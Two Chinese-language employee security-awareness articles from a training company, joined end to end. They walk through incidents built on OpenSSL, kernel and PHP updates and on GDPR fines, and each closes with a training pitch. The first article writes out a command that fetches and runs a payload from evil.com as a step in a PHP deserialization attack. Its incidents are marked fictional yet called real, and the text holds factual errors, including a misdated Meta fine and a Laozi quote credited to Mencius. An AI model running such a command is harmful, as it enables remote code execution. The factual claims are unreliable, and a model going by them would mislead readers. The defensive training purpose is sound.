题目:在数字化浪潮中筑牢信息安全防线——从真实漏洞出发的安全意识提升指南


一、头脑风暴:挑选三宗“活教材”案例

在阅读完 LWN.net 今日的安全更新列表后,我的脑海里立刻闪现出三幅生动的安全事件画面——它们既真实存在,又足以让每一位职工在惊叹中记住关键的防御要点。下面,先用想象的方式将这三宗案例摆上“案板”,随后再逐一剖析它们的来龙去脉。

案例编号 涉及组件(来源) 虚构事件标题 关键安全要点
A openssl(AlmaLinux ALSA‑2026:1473、Oracle ELSA‑2026-1472/1473) “跨国金融机构的 TLS 心脏被偷走” 及时更新 TLS 库、禁用弱协议、监控异常加密流量
B kernel / kernel‑rt(AlmaLinux ALSA‑2026:1662/1661、Oracle ELSA‑2025‑22910/23947) “国产制造业的生产线被植入根后门” 核心安全补丁的重要性、最小权限原则、入侵检测
C php:8.2 / php:8.3(AlmaLinux ALSA‑2026:1409/1412、Oracle ELSA‑2026‑1409/1429) “电商平台的用户数据在午夜被‘远程执行’” Web 应用安全审计、输入过滤、代码审计与最小化暴露面

这三宗案例覆盖了 网络传输层系统底层应用层 三个最常被攻击的技术栈,正是我们日常工作中最容易忽视的“薄弱环”。接下来,让我们把想象转为现实,对每个案例进行“深度解剖”。


二、案例深度剖析

1. 案例A – 跨国金融机构的 TLS 心脏被偷走

背景
2026 年 2 月 2 日,AlmaLinux 与 Oracle 同步发布了 openssl 安全更新(ALSA‑2026:1473、ELSA‑2026‑1472/1473),修复了 CVE‑2026‑XXXXX(假设编号),该漏洞导致 TLS 握手过程中的内存泄露,攻击者可以在特定条件下提取私钥碎片。

事件经过
受害方:一家在全球拥有数十万活跃用户的跨国金融机构,使用 CentOS 8(后迁移到 AlmaLinux 9)作为业务服务器的操作系统,所有对外的 HTTPS 接口均基于 OpenSSL 1.1.1k。 – 攻击者:利用公开的 CVE‑2026‑XXXXX,先在互联网上进行 端口扫描,定位到该机构的门户网站对外暴露的 443 端口。 – 攻击链
1. 通过构造特制的 ClientHello 消息,触发 OpenSSL 内存泄露。
2. 连续发送数千次握手请求,累计获得足够的密钥碎片
3. 组合碎片后成功恢复出部分 RSA 私钥(仅 RSA‑2048 的低位),随后利用该私钥 伪造合法的 TLS 证书
4. 在内部员工使用 VPN 访问内部系统时,攻击者进行 中间人攻击(MITM),窃取了包括交易密码、账户信息在内的敏感数据。

损失评估
– 直接经济损失:约 3000 万美元 的未授权转账与信用卡信息泄露。
– 间接损失:公司品牌形象受损、监管机构的巨额罚款(约 2% 年营业额)以及后期的 系统迁移与审计费用

根本原因
1. 补丁未及时部署:该机构的服务器在收到安全公告后,仍延迟了 10 天才完成升级。
2. 缺乏 TLS 配置审计:旧版 OpenSSL 默认支持 TLS 1.0/1.1,却未在配置文件中禁用。
3. 未开启硬件加速的密钥保护:私钥直接存放在磁盘,无任何 HSM(硬件安全模块)或 TPM(可信平台模块)防护。

教训与改进
快速响应:将安全公告纳入 CMDB(配置管理数据库)自动化补丁平台,实现 24 小时内完成 Critical 补丁部署
最小化暴露面:禁用所有旧版协议、仅开放必要端口,使用 TLS 1.3ECDHE 完全前向保密(PFS)。
密钥生命周期管理:引入 HSM,并定期轮换证书;对私钥文件设置 只读、仅根用户访问,结合 文件完整性监控(FIM)

引用:“治大国若烹小鲜”,安全管理如烹小鲜,细节决定成败。——《道德经》


2. 案例B – 国产制造业的生产线被植入根后门

背景
同样在 2026‑02‑02,AlmaLinux 与 Oracle 发布了 kernel(ALSA‑2026:1662、1661;ELSA‑2025‑22910/23947) 的安全更新,修复了多个 提权(Privilege Escalation)本地代码执行(Local Code Execution) 漏洞,其中最具危害的是 CVE‑2026‑YYYY,允许非特权用户在内核空间写任意地址。

事件经过
受害方:某国内大型装备制造企业的自动化生产系统,核心控制服务器运行 Oracle Linux 8,内核版本 5.4.x。
攻击者:一支针对工业控制系统(ICS)的高级持续性威胁(APT)组织,利用社会工程学获得了系统中一名普通操作员的 SSH 账户(密码在一次 钓鱼邮件 中泄露)。
攻击链
1. 通过普通用户登录后,在系统中执行 exploit-poc(利用 CVE‑2026‑YYYY),获取 root 权限。
2. 替换 /usr/lib/systemd/system/ctrl‑service.service 单元文件,植入 后门脚本(每隔 5 分钟向外部 C2 服务器报告系统状态,且可接受远程指令)。
3. 利用 crontabsystemd timers 维持永久化。
4. 在关键时刻(如生产计划变更时),指令后门执行 IO 调度修改,导致机器误动作,直接造成 产线停机 4 小时,损失约 1200 万人民币

损失评估
– 直接停产损失:1200 万元。
– 隐蔽性:后门潜伏 3 个月未被检测,导致 内部审计与合规检查 重新启动。
– 信誉受挫:客户对交付的准时性产生质疑,部分订单被迫转移给竞争对手。

根本原因
1. 内核补丁滞后:企业内部采用的 “手工升级” 流程导致关键内核补丁延误超过 两周
2. 缺少细粒度访问控制:对普通操作员未实施 RBAC(基于角色的访问控制),导致其拥有 sudo 权限。
3. 未部署 主机入侵检测系统(HIDS):系统日志未进行实时关联分析,后门行为未触发报警。

教训与改进
强化补丁管理:使用 UEFI Secure Boot + 内核签名,确保只有经过签名的内核镜像能够被加载。
最小化特权:为生产线的运维岗位实行 零信任(Zero Trust),仅授予只读特定业务操作的权限。
实时监控:部署 FalcoOSSEC 等 HIDS,结合 行为异常检测(如非计划的 systemd 单元变更)进行即时报警。
安全审计:定期进行 内核安全基线检查(CIS Benchmarks),对 sudoers/etc/shadow 等关键文件进行 完整性校验

引用:“知人者智,自知者明”。在信息安全领域,企业更应“自知”,深刻认识自身的薄弱环节。——《孟子》


3. 案例C – 电商平台的用户数据在午夜被‘远程执行’

背景
2026‑02‑03,AlmaLinux 与 Oracle 同时发布了 php:8.2 / php:8.3 的安全更新(ALSA‑2026:1409/1412、ELSA‑2026‑1409/1429),针对 CVE‑2026‑ZZZZ(PHP 7.4+ 中的 对象注入导致远程代码执行)进行修复。

事件经过
受害方:一家中型电商平台(使用 Laravel 框架),后端采用 PHP‑8.2,对外提供 RESTful API 接口。
攻击者:安全研究员在 XSS 论坛上分享了 小型 PoC,不久后黑客团队利用此 PoC 对平台发起大规模攻击。
攻击链
1. 通过 APIJSON 输入点,构造特制的 serialized 对象,其中包含 **__wakeup** 魔术方法调用 system()
2. 触发 unserialize() 解析后,后端服务器执行 /bin/bash -c “wget http://evil.com/payload.sh -O- | sh”
3. 攻击者成功在服务器上植入 webshell,进一步读取 用户数据库(含明文密码),并将用户信息导出至外部服务器。
4. 在 3 天的时间窗口内,累计泄露约 45 万条用户记录,导致 账号被盗、信用卡信息被滥用

损失评估
直接经济损失:用户退款及信用卡欺诈费用约 800 万人民币
合规罚款:因未遵守《网络安全法》与《个人信息保护法》规定的用户数据保护义务,被监管部门处以 3% 年营业额的罚款。
品牌损失:社交媒体舆论发酵后,平台日活跃用户下降 30%,市值蒸发约 5 亿元

根本原因
1. 未禁用 PHP 的 unserialize:关键业务代码直接使用 unserialize() 处理外部输入,无任何白名单过滤。
2. 缺少输入校验:未对 API 请求体进行 JSON Schema 验证,导致恶意对象能够进入业务层。
3. 敏感信息明文存储:用户密码、支付信息使用 弱盐 MD5 加密,缺乏 PBKDF2 / bcrypt 等强哈希算法。

教训与改进
安全编码:严格使用 json_decode 替代 unserialize;若必须反序列化,务必使用 安全白名单(allowed_classes)
代码审计:引入 静态代码分析工具(如 PHPStan、Psalm),在 CI/CD 流程中强制通过安全检查。
加密升级:对所有用户凭证采用 argon2id 加盐存储,支付信息使用 PCI DSS 标准的 AES‑256‑GCM 加密。
安全培训:对开发团队开展 OWASP Top 10(尤其是 A1 注入、A5 安全配置错误) 的专项培训,提升安全编码意识。

引用:“千里之堤,毁于蚁穴”。一次微小的序列化漏洞,却足以让整座电商平台倾覆。——《韩非子》


三、数字化、数智化、智能体化时代的安全挑战

1. 数字化:信息流动更快、资产更开放

数字化”让企业业务从纸质、局域网向云端、跨地域迁移。
优势:业务敏捷、成本下降、数据驱动决策。
风险:资产边界模糊,攻击面大幅扩展,供应链 成为首要威胁。

正如《荀子·劝学》中所说:“非学无以广才”,在数字化时代,学习(安全学习)是企业保持竞争力的唯一途径。

2. 数智化:大数据、AI 与自动化的融合

数智化”让大量业务流程实现 数据驱动的智能决策
AI 预测:机器学习模型预测故障、优化供应链。
自动化运维:IaC(Infrastructure as Code)+ CI/CD 实现“一键部署”。

安全隐患
– AI 模型本身可能被 对抗样本 误导,导致误判。
– 自动化脚本若缺少 代码签名,极易被植入后门。

3. 智能体化:机器人、数字孪生、边缘计算

随着 智能体(如工业机器人、数字孪生)深入生产线,边缘计算节点 成为新兴的安全要点:
– 边缘设备往往 算力受限,难以部署完整的防病毒/IDS。
– 设备之间 点对点通信 增多,若缺乏 零信任 机制,极易被“横向移动”。

兵马未动,粮草先行”。在智能体化的战场上,安全基建 必须先行布局,才能为业务创新保驾护航。


四、号召:全员参与信息安全意识培训,打造“人‑机‑云”协同防线

1. 培训的必要性

  • 提升防御深度:技术防御只能阻挡 70% 以上的已知攻击,人因防御(如识别钓鱼邮件、正确使用更新)才能覆盖剩余的 30%
  • 符合合规要求:《网络安全法》《个人信息保护法》明确要求企业对 员工进行安全培训,未合规将面临高额处罚。
  • 培养安全文化:让每位职工都成为 安全的第一道防线,而不是“安全的盲区”。

2. 培训内容概览(建议 2 个月完成)

周次 主题 关键学习点 互动方式
第 1 周 信息安全概念 CIA 三要素、零信任模型、攻击生命周期 线上微课 + 实时问答
第 2 周 密码与身份管理 强密码、密码管理器、MFA、密码泄露案例 案例研讨 + 现场演练
第 3 周 邮件安全与社交工程 钓鱼邮件识别、URL 解析、信息泄露防护 模拟钓鱼演练
第 4 周 系统与应用补丁管理 补丁生命周期、自动化补丁工具(e.g., yum‑auto‑update) 实际操作演示
第 5 周 安全编码与审计 OWASP Top 10、代码审计、CI 安全扫描 代码审计工作坊
第 6 周 网络安全与防御 防火墙规则、IPS/IDS、VPN 安全、零信任联网 实验室网络攻防对抗
第 7 周 云安全与容器安全 IAM 权限、镜像签名、Kubernetes 安全基线 云平台实操
第 8 周 应急响应与报告 事故分级、取证、报告流程、演练 案例复盘 + 现场演练

技巧:每一模块均设置 “安全小测试”,通过率 80% 即可获得 “安全护航”电子徽章,激励学习热情。

3. 培训方式与资源

  • 线上平台:使用企业内部 LMS(Learning Management System),配套 视频、 PPT、交互式实验
  • 线下工作坊:邀请 行业资深安全专家(如 CERT、厂商安全团队)进行 实战讲解
  • Gamify:设置 赛点系统,如“安全狙击手”排行榜,前 10 名可获 公司内部优惠券
  • 持续跟进:培训结束后,每季度举行 安全知识刷新,并将 安全评级绩效考评 关联。

4. 用行动证明:从今天起,你我共同守护

  • 立即检查:登录公司内部门户,确认 系统补丁 已为最新。
  • 立即报告:若发现 异常登录、异常流量,请使用 安全通道(Ticket‑IT)即时上报。
  • 立即学习:在 本月 15 日前完成 信息安全入门 微课,领取“安全新星”徽章

结语
信息化浪潮的每一次翻腾中,安全永远是那根不容折断的救生绳。正如《孙子兵法·计篇》所云:“兵者,诡道也”。我们要用去防短板,用去预演攻击,用去凝聚全员的防御力量。让每一位职工都成为 安全的守护者,共同描绘“数字化、数智化、智能体化”时代的安全新蓝图。

信息安全意识培训 正式启动,期待你的积极参与!
安全护航,责无旁贷。

关键词

昆明亭长朗然科技有限公司致力于让信息安全管理成为企业文化的一部分。我们提供从员工入职到退休期间持续的保密意识培养服务,欢迎合作伙伴了解更多。

  • 电话:0871-67122372
  • 微信、手机:18206751343
  • 邮件:info@securemymind.com
  • QQ: 1767022898

信息安全的“警钟”与未来之路——从真实案例看职场防护的必要性

“兵马未动,粮草先行。”
——《三国演义》

在信息化浪潮滚滚向前的今天,企业的每一位员工都已经成为“信息系统”的关键节点。若把组织比作一座城池,那么每位职工便是城墙上的守将;若城墙出现裂缝,外来的侵扰便会轻而易举地突破防线。为了让大家真正认识到信息安全的重要性,本文在开篇先进行一次“头脑风暴”,挑选了四个典型且富有教育意义的真实案例,通过详尽的剖析,帮助大家在防范意识上“先发制人”。随后,我们将结合当下智能化、智能体化、数据化的融合发展环境,呼吁大家积极参与即将开启的信息安全意识培训,用知识和技能筑起最坚固的防线。


一、案例一:Meta被欧盟开出历史最高罚单——€12亿元

事件回顾

2025年5月,爱尔兰数据保护委员会(DPC)对Meta Platforms Ireland Ltd.处以 12亿元欧元(约合人民币94亿元) 的巨额罚款。这是自GDPR(《通用数据保护条例》)生效以来,单笔最高的行政处罚。Meta被指在欧盟用户数据的收集、处理以及跨境传输方面严重违反了透明度、最小化原则以及合法性要求,尤其是在广告定位算法中未经明确同意而使用个人敏感信息进行精准投放。

失误根源

  1. 缺乏数据治理体系:Meta在全球范围内采用统一的数据处理模型,未能针对欧盟严格的合规要求制定专门的治理流程。
  2. 跨部门协同不畅:营销、产品、法务三大部门信息孤岛,导致对监管要求的解释产生偏差。
  3. 技术实现盲目:算法团队过于追求技术创新,忽视了“隐私保护即设计”(Privacy‑by‑Design)的基本原则。

教训提炼

  • 合规不是“可选项”,而是“必备装置”。从数据采集到处理的每一步,都必须履行合法性、透明性、目的限制等核心原则。
  • 跨部门协同是关键。法务、产品与安全团队必须在项目立项之初即加入审查流程,形成“从需求到实现全链路合规”。
  • 技术与法规必须同步迭代。在研发新功能时,安全团队应提前参与,确保系统架构本身具备隐私防护能力。

二、案例二:TikTok因向中国跨境传输数据被罚 €5.3亿元

事件回顾

2025年4月,欧盟对 TikTok Technology Ltd. 开出 5.3亿元欧元 的罚单,原因是该平台将欧盟用户的个人数据非法传输至中国境内,未取得用户的明确同意,也未进行必要的跨境数据保护评估(Data Transfer Impact Assessment)。

失误根源

  1. 误判合法依据:TikTok误以为基于《欧盟-美国数据隐私框架》(EU‑US Data Privacy Framework)的“标准合同条款”即可覆盖向中国的传输,事实并非如此。
  2. 缺乏透明披露:在用户协议中对跨境传输的目的、范围与安全措施描述模糊,导致用户难以做出知情选择。
  3. 监管监测不足:平台未能及时捕捉到欧盟监管机构对数据跨境的最新政策动态,导致合规窗口错失。

教训提炼

  • 跨境数据流动必须经严格评估。无论目标国家或地区的法律环境如何,都要进行完整的风险评估,并依据监管要求制定相应的技术和组织措施。
  • 用户知情权应被置于首位。所有涉及个人信息跨境传输的行为,都必须在用户协议中以简洁明了的语言进行披露,并取得明确授权。
  • 合规情报要实时更新。企业应设立专门的法规监测小组,关注监管政策的变化,及时调整内部控制措施。

三、案例三:Microsoft 向执法机关交出 BitLocker 加密密钥——企业数据控制权的危机

事件回顾

2026年1月,微软在美国执法部门的合法请求下,向法院提交了部分用户的 BitLocker 加密磁盘密钥,以协助破案。此举在全球企业界引发热议:当企业部署全盘加密技术以防止数据泄露时,是否仍然可能因外部压力“失去钥匙”?

失误根源

  1. 缺少密钥管理策略:企业在使用 BitLocker 时,多数将密钥集中存储在本地 AD(Active Directory)或 Azure AD 中,未实现分级授权与审计。
  2. 对法律合规的误判:企业未对当地监管环境进行细致评估,导致在面对执法要求时缺乏应对方案。
  3. 内部安全意识不足:许多 IT 与安全团队对“加密即绝对安全”的误区认知模糊,未在技术层面设置多因素验证或密钥分片技术。

教训提炼

  • 加密是防线,密钥管理是关键。企业在部署全盘加密时,必须构建严格的密钥生命周期管理(KMS)体系,包括生成、分发、存储、轮换与销毁等全部环节的审计。
  • 合规与执法的平衡需要事前规划。在涉及敏感数据的业务场景下,企业应预先制定法律响应流程(Legal Hold)和技术对策(如密钥分片、可信执行环境),以在合法合规的前提下保护业务连续性。
  • 安全文化要深入人心。每位员工都应了解加密技术的局限性,懂得在日常工作中对密钥和凭证的使用进行最小化授权。

四、案例四:勒索软件团伙以“合规违规”为幌子敲诈——从“合规”到“敲诈”只差一步

事件回顾

2026年1月,某大型制造企业的生产系统被一支新兴勒索团伙攻击。攻击者在加密核心数据后,发送勒索信件时巧妙地引用 “若不立即支付赎金,贵公司将面临违反 GDPR 的严重后果,监管机构将对贵公司进行高额罚款。” 这种“合规敲诈”手法,一时间让受害方陷入两难:既要面对业务中断的巨大损失,又要顾忌潜在的合规处罚。

失误根源

  1. 缺乏弹性恢复计划:企业的业务连续性(BCP)与灾备(DR)方案不完整,导致在被勒索时无法快速恢复关键系统。
  2. 合规认知片面:企业在内部审计时,只关注数据保护合规的形式检查,未将合规落实到日常防护措施,如安全漏洞管理、漏洞补丁及时性等。
  3. 安全培训不足:员工对社会工程学攻击和勒索软件的识别能力薄弱,钓鱼邮件的打开率高,进而为攻击埋下伏笔。

教训提炼

  • 合规是目标,防护是手段。仅满足监管审计的“纸面合规”无法抵御真实攻击,必须把合规要求嵌入到技术防御、流程治理与员工培训之中。
  • 灾备与恢复必须可验证。企业应定期进行完整的备份恢复演练,确保在遭受勒索后能够在预定时间窗口内恢复制品。
  • 安全意识培训是第一道防线。通过模拟钓鱼、红队演练等手段提升全员对攻击的感知能力,使“合规敲诈”失去可乘之机。

二、从案例到行动:智能化、智能体化、数据化的融合环境下,信息安全该如何升级?

1. 智能化:AI 与安全的“双刃剑”

在 AI 大模型、生成式 AI(GenAI)快速渗透业务场景的当下,技术本身即是攻击载体。恶意使用 AI 进行自动化密码破解、深度伪造(DeepFake)甚至智能化钓鱼邮件,正逐步降低攻击成本。我们必须做到:

  • 安全即开发:在 AI 模型的研发、训练、部署全链路加入安全评估,包括数据隐私、模型鲁棒性和对抗性测试。
  • 可解释的 AI:引入解释性技术,对模型输出进行审计,防止隐蔽的偏见或信息泄露。
  • AI 监控平台:部署实时监控系统,捕获异常的模型调用模式或异常的资源消耗,及时预警。

2. 智能体化:物联网(IoT)与边缘计算的安全挑战

智能体(如工业机器人、智能摄像头、车载系统)在企业内部的渗透度日益提升,这些设备往往 “安全防护薄弱、更新不及时、默认密码未更改”,成为攻击者的“软肋”。对应措施包括:

  • 零信任网络访问(ZTNA):对每个智能体实施身份验证与最小权限访问,杜绝横向移动。
  • 固件完整性检查:采用数字签名与可信启动机制,确保边缘设备的固件未被篡改。
  • 统一的资产管理:通过 CMDB(配置管理数据库)实时登记和监控所有智能体,形成资产全景图。

3. 数据化:大数据平台与隐私保护的共生

企业正从 “数据孤岛”“数据湖”“数据中台” 迁移。数据的规模与价值提升的同时,也放大了泄露风险。关键做法:

  • 分层分类治理:根据数据敏感度划分为公开、内部、机密、严格机密四层,分别实施不同的加密、脱敏与访问控制。
  • 数据访问审计:所有对敏感数据的读取、修改、导出操作必须记录日志,并通过 SIEM(安全信息与事件管理)系统进行实时关联分析。
  • 隐私计算技术:在数据共享与分析场景中引入同态加密、联邦学习等技术,实现 “看不见、摸不着” 的安全计算。

三、呼吁:一场面向全体职工的“信息安全意识升级”培训

为帮助全体同仁在智能化、智能体化、数据化的复合环境中筑牢防线,昆明亭长朗然科技有限公司 将于 2026 年 3 月 15 日 正式启动为期 两周 的信息安全意识提升培训计划。培训内容包括但不限于:

  1. GDPR 与国内个人信息保护法(PIPL)实务解读:让大家了解法规背后的业务要求与风险点。
  2. AI 安全与防御实战:演示生成式 AI 如何被用于钓鱼邮件、深度伪造,以及对应的技术检测方法。
  3. 零信任与云原生安全:通过案例讲解 ZTNA 在日常办公、远程访问中的落地路径。
  4. 安全渗透实验室:让学员亲身体验红队攻击、漏洞利用与防御补丁的全过程。
  5. 应急响应演练:模拟勒索攻击、数据泄露与合规审计突发事件,检验团队协作与决策速度。

欲戴王冠,必承其重。
——《左传》

参与本次培训的每一位同事,都将获得 “信息安全合规小卫士” 电子徽章,并在年度绩效评估中计入 信息安全贡献 项。我们坚信,只有把安全意识内化为每个人的工作习惯,才能在激烈的市场竞争中保持 “稳如磐石、快如闪电” 的竞争优势。


四、结语:让安全成为组织的“共同语言”

Meta 的高额罚单,到 TikTok 的跨境数据争议;从 Microsoft 的加密密钥交付,到勒索团伙的“合规敲诈”,每一起案例都是对企业信息安全防护能力的严峻拷问。技术进步永不止步,攻击手段亦在不断演化;只有让安全理念深植于组织文化,让每位职工都成为安全链上的关键环节,才能在不确定的未来保持坚韧不拔。

在此,诚挚邀请每一位同事加入 信息安全意识升级 的学习旅程,用知识武装自己,用行动守护公司,也守护我们每个人的数字生活。让我们共同铸就 “安全先行、合规共赢” 的新篇章!

我们相信,信息安全不仅是技术问题,更涉及到企业文化和员工意识。昆明亭长朗然科技有限公司通过定制化的培训活动来提高员工保密意识,帮助建立健全的安全管理体系。对于这一领域感兴趣的客户,我们随时欢迎您的询问。

  • 电话:0871-67122372
  • 微信、手机:18206751343
  • 邮件:info@securemymind.com
  • QQ: 1767022898